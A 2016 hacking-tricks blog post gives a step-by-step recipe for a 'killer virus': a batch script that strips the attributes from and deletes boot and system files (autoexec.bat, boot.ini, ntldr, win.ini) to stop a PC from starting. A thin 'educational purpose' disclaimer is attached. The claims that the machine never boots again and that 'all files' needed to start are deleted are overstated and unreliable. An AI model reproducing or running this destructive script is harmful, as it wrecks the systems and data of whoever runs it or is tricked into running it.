Monday, 17 October 2016

How to create a virus to crash a PC for forever??


Hi readers, I am back with a killer virus trick, by using it you can crash any pc for forever (it will never reboot again)

as-usual i am using batch programming for creating virus code. Beware don’t run it on your own pc otherwise you are responsible for your damage.
Warning:-
This article is only for educational purpose. It is just to show the power of batch programming.

Steps to create killer virus
1. open your notepad
2. now copy the below code

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

3.  Now save it as killer.bat

4. So that’s it, killer notepad virus to crash a pc is created

REMEMBER:- Do not double click on this file because this virus deletes all files that are needed to start a computer.

>Hope you like it, stay updated & follow us for more exciting tricks

No comments: